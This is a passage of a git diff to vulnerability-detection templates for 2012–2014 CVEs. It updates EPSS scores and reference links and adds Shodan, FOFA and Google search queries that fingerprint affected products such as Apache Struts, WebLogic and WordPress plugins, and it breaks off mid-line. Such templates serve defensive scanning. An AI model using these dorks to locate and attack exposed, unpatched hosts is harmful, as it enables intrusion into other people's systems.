a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -25,6 +25,7 @@ info: max-request: 2 vendor: laurent_destailleur product: awstats + shodan-query: cpe:"cpe:2.3:a:laurent_destailleur:awstats" tags: cve2012,cve,xss,awstats,edb,laurent_destailleur http: diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 69ab252b50..0338057e99 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -28,8 +28,9 @@ info: vendor: mikejolley product: download_monitor framework: wordpress + shodan-query: http.html:"/wp-content/plugins/download-monitor/" + fofa-query: body="/wp-content/plugins/download-monitor/" tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 8182a35a3e..1fd009f975 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2012-4878 cwe-id: CWE-22 - epss-score: 0.00608 - epss-percentile: 0.7813 + epss-score: 0.00537 + epss-percentile: 0.7717 cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index be960aed11..f890c57174 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-4889 cwe-id: CWE-79 epss-score: 0.03526 - epss-percentile: 0.91352 + epss-percentile: 0.91568 cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index f427fcec55..095685c3f8 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2012-4982 cwe-id: CWE-20 epss-score: 0.00357 - epss-percentile: 0.71561 + epss-percentile: 0.72078 cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index c9a6ae8f37..6b48c50ead 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -20,14 +20,15 @@ info: cvss-score: 5.8 cve-id: CVE-2012-5321 cwe-id: CWE-20 - epss-score: 0.01926 - epss-percentile: 0.87386 + epss-score: 0.01708 + epss-percentile: 0.87767 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tiki product: tikiwiki_cms\/groupware shodan-query: http.html:"tiki wiki" + fofa-query: body="tiki wiki" tags: cve,cve2012,redirect,tikiwiki,groupware,tiki http: diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index ba0b6775f3..4fa2b42211 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -21,14 +21,13 @@ info: cve-id: CVE-2012-5913 cwe-id: CWE-79 epss-score: 0.01863 - epss-percentile: 0.88104 + epss-percentile: 0.8837 cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wordpress_integrator_project product: wordpress_integrator tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 7eade9c1f7..013dd3ec0a 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.8 cve-id: CVE-2012-6499 cwe-id: CWE-20 - epss-score: 0.01204 - epss-percentile: 0.83755 + epss-score: 0.03575 + epss-percentile: 0.91621 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 792c18b646..100e36e4a3 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve2013,cve,apache,rce,struts,ognl http: diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index b377638929..00c3842261 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -19,13 +19,16 @@ info: cvss-score: 5.8 cve-id: CVE-2013-2248 cwe-id: CWE-20 - epss-score: 0.97268 - epss-percentile: 0.99838 + epss-score: 0.97189 + epss-percentile: 0.99819 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve2013,cve,apache,redirect,struts,edb http: diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 33f46ae811..64ccc8c25b 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -26,6 +26,9 @@ info: max-request: 9 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve2013,cve,rce,struts,apache,ognl,kev http: diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 462bf63912..37be99a04c 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -20,15 +20,14 @@ info: cve-id: CVE-2013-2287 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.59251 + epss-percentile: 0.59874 cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: roberta_bramski product: uploader google-query: inurl:"/wp-content/plugins/uploader" - tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski - + tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski,intrusive flow: http(1) && http(2) http: diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 47c48e1895..731a8c9f84 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -14,13 +14,14 @@ info: - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/83311 - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2013-3526 cwe-id: CWE-79 epss-score: 0.00519 - epss-percentile: 0.74326 + epss-percentile: 0.76703 cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -28,7 +29,6 @@ info: product: trafficanalyzer google-query: inurl:"/wp-content/plugins/trafficanalyzer" tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer - flow: http(1) && http(2) http: diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 1e74819b55..03118bbcc8 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -25,6 +25,9 @@ info: max-request: 10 vendor: oracle product: fusion_middleware + shodan-query: http.title:"weblogic" + fofa-query: title="weblogic" + google-query: intitle:"weblogic" tags: cve,cve2013,edb,lfi,javafaces,oracle http: diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 1c8d954e50..3e63fa5c58 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2013-4117 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.83801 + epss-percentile: 0.85273 cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: category-grid-view-gallery google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma - flow: http(1) && http(2) http: diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 7b2545baa8..ac3f74f129 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2013-4625 cwe-id: CWE-79 epss-score: 0.01217 - epss-percentile: 0.85008 + epss-percentile: 0.85273 cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -28,7 +28,6 @@ info: product: duplicator google-query: inurl:"/wp-content/plugins/duplicator" tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle - flow: http(1) && http(2) http: diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 3d944f4bee..b3f0897619 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2013-5979 cwe-id: CWE-22 - epss-score: 0.04915 - epss-percentile: 0.92611 + epss-score: 0.07984 + epss-percentile: 0.94272 cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index 255fd4324b..f232cefc9d 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -21,8 +21,8 @@ info: cvss-score: 4.3 cve-id: CVE-2013-6281 cwe-id: CWE-79 - epss-score: 0.00327 - epss-percentile: 0.70301 + epss-score: 0.0028 + epss-percentile: 0.68344 cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 44c34d428f..dcc74225d0 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: synacor product: zimbra_collaboration_suite + shodan-query: http.title:"zimbra collaboration suite" + fofa-query: title="zimbra web client sign in" + google-query: intitle:"zimbra collaboration suite" tags: cve2013,cve,packetstorm,zimbra,lfi,edb,synacor http: diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index d0998b099d..a638342e79 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2013-7240 cwe-id: CWE-22 - epss-score: 0.21533 - epss-percentile: 0.96023 + epss-score: 0.26523 + epss-percentile: 0.96738 cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index ac36dc0e9f..ada7d4c3c8 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-1203 cwe-id: CWE-77 epss-score: 0.02045 - epss-percentile: 0.88732 + epss-percentile: 0.88951 cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index 68d8ce7de3..157d09e484 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -21,13 +21,14 @@ info: cvss-score: 10 cve-id: CVE-2014-2321 cwe-id: CWE-264 - epss-score: 0.96364 - epss-percentile: 0.99452 + epss-score: 0.95464 + epss-percentile: 0.99375 cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zte product: f460 + shodan-query: cpe:"cpe:2.3:h:zte:f460" tags: cve2014,cve,iot,zte http: diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index 6b84e07eae..cea3f4dc40 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2014-2323 cwe-id: CWE-89 epss-score: 0.96033 - epss-percentile: 0.99445 + epss-percentile: 0.99481 cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: lighttpd product: lighttpd + shodan-query: cpe:"cpe:2.3:a:lighttpd:lighttpd" tags: cve2014,cve,lighttpd,injection,seclists,sqli http: diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index bd7dd109a6..282e65681c 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.8 cve-id: CVE-2014-2383 cwe-id: CWE-200 - epss-score: 0.00511 - epss-percentile: 0.76134 + epss-score: 0.00363 + epss-percentile: 0.72296 cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index 3ac2dfa0fe..aeb09fa129 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.3 cve-id: CVE-2014-2908 cwe-id: CWE-79 - epss-score: 0.00594 - epss-percentile: 0.76056 + epss-score: 0.0045 + epss-percentile: 0.75068 cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 1b31232ed7..559529be23 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.8 cve-id: CVE-2014-2962 cwe-id: CWE-22 - epss-score: 0.95825 - epss-percentile: 0.99395 + epss-score: 0.95717 + epss-percentile: 0.99419 cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index c28ab34ad6..c1b42f6c26 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -22,12 +22,13 @@ info: cve-id: CVE-2014-3120 cwe-id: CWE-284 epss-score: 0.53209 - epss-percentile: 0.97551 + epss-percentile: 0.97602 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elasticsearch product: elasticsearch + fofa-query: index_not_found_exception tags: cve2014,cve,rce,elasticsearch,kev,vulhub,elastic http: diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 3bf155e20d..1c6524f68c 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2014-3744 cwe-id: CWE-22 epss-score: 0.00672 - epss-percentile: 0.77635 + epss-percentile: 0.79778 cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nodejs product: node.js + shodan-query: cpe:"cpe:2.3:a:nodejs:node.js" tags: cve2014,cve,lfi,nodejs,st http: diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 1f6974f7c3..181d9dbb26 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -20,14 +20,16 @@ info: cvss-score: 5 cve-id: CVE-2014-4210 cwe-id: NVD-CWE-noinfo - epss-score: 0.96955 - epss-percentile: 0.9967 + epss-score: 0.96657 + epss-percentile: 0.99634 cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: oracle product: fusion_middleware shodan-query: title:"Weblogic" + fofa-query: title="weblogic" + google-query: intitle:"weblogic" tags: cve2014,cve,seclists,weblogic,oracle,ssrf,oast,xss http: diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 8c002e1bc1..5beabf687e 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 - http://wordpress.org/plugins/infusionsoft/changelog - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-4536 cwe-id: CWE-79 epss-score: 0.00149 - epss-percentile: 0.50857 + epss-percentile: 0.50948 cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +30,6 @@ info: framework: wordpress google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 41d512b06b..8095b8dbc9 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4539 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47838 + epss-percentile: 0.48718 cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -28,7 +28,6 @@ info: product: movies framework: wordpress tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index f87981322e..2bb3fb697b 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -13,13 +13,14 @@ info: - https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301 - https://nvd.nist.gov/vuln/detail/CVE-2014-4558 - http://codevigilant.com/disclosure/wp-plugin-swipehq-payment-gateway-woocommerce-a3-cross-site-scripting-xss + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-4558 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48556 + epss-percentile: 0.48718 cpe: cpe:2.3:a:cybercompany:swipehq-payment-gateway-woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -27,7 +28,6 @@ info: product: swipehq-payment-gateway-woocommerce framework: wordpress tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index b1e5187f18..fb2bf85812 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4561 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.40364 + epss-percentile: 0.40792 cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -28,7 +28,6 @@ info: product: ultimate-weather framework: wordpress tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project - flow: http(1) && http(2) http: diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 90fe1a1ae5..fca10862e5 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2014-4940 cwe-id: CWE-22 - epss-score: 0.03212 - epss-percentile: 0.90985 + epss-score: 0.05292 + epss-percentile: 0.93046 cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index 8df99e4d08..2e873e82b5 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: webedition product: webedition_cms + shodan-query: cpe:"cpe:2.3:a:webedition:webedition_cms" tags: cve2014,cve,edb,packetstorm,lfi,webedition http: diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml index b1bdf04366..ee93326360 100644 --- a/http/cves/2014/CVE-2014-6271.yaml +++ b/http/cves/2014/CVE-2014-6271.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-6271 cwe-id: CWE-78 epss-score: 0.97559 - epss-percentile: 0.99997 + epss-percentile: 0.99998 cpe: cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:* metadata: max-request: 8 diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml index 5b7d648f67..cc28a0a534 100644 --- a/http/cves/2014/CVE-2014-6287.yaml +++ b/http/cves/2014/CVE-2014-6287.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: 'CVE-2014-6287' cwe-id: CWE-94 - epss-score: 0.97289 - epss-percentile: 0.99851 + epss-score: 0.97341 + epss-percentile: 0.99889 cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: rejetto product: http_file_server shodan-query: http.favicon.hash:2124459909 + fofa-query: icon_hash=2124459909 tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto variables: str1: '{{rand_base(6)}}' diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 2eb92670c9..59abfcf55b 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -28,6 +28,8 @@ info: max-request: 1 vendor: soplanning product: soplanning + shodan-query: http.html:"soplanning" + fofa-query: body="soplanning" tags: cve2014,cve,packetstorm,edb,seclists,soplanning,lfi,xss http: diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 321ab2db3e..5f3cab51ff 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -29,6 +29,8 @@ info: vendor: gogits product: gogs shodan-query: title:"Sign In - Gogs" + google-query: intitle:"sign in - gogs" + fofa-query: title="sign in - gogs" tags: cve2014,cve,gogs,seclists,packetstorm,edb,sqli,gogits http: diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml index dd9b9f18af..bf6ac7e08f 100644 --- a/http/cves/2014/CVE-2014-8799.yaml +++ b/http/cves/2014/CVE-2014-8799.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-8799 cwe-id: CWE-22 epss-score: 0.17844 - epss-percentile: 0.96039 + epss-percentile: 0.9615 cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index faf2b9414d..d6341be61d 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -16,8 +16,8 @@ info: cvss-score: 5 cve-id: CVE-2014-9180 cwe-id: CWE-601 - epss-score: 0.00285 - epss-percentile: 0.6809 + epss-score: 0.00214 + epss-percentile: 0.59443 cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,7 @@ info: vendor: eleanor-cms product: eleanor_cms shodan-query: html:"eleanor" + fofa-query: body="eleanor" tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms http: diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 4e01a22313..cfbe7037c3 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -13,13 +13,14 @@ info: - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7 - https://nvd.nist.gov/vuln/detail/CVE-2014-9444 - http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2014-9444 cwe-id: CWE-79 - epss-score: 0.00287 - epss-percentile: 0.65501 + epss-score: 0.00619 + epss-percentile: 0.78788 cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index 20225da1f4..e044328774 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -13,13 +13,14 @@ info: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9606 - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-9606 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41261 + epss-percentile: 0.41716 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index e00d43f46f..144c8dfc93 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9607 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40591 + epss-percentile: 0.41716 cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 5561db4d36..a894613804 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2014-9608 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.40591 + epss-percentile: 0.41716 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 48e1769a8f..56a54e3022 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9614 cwe-id: CWE-798 epss-score: 0.01433 - epss-percentile: 0.85223 + epss-percentile: 0.8655 cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml index 2be4ac953e..cecf244e49 100644 --- a/http/cves/2014/CVE-2014-9617.yaml +++ b/http/cves/2014/CVE-2014-9617.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2014-9617 cwe-id: CWE-601 epss-score: 0.00109 - 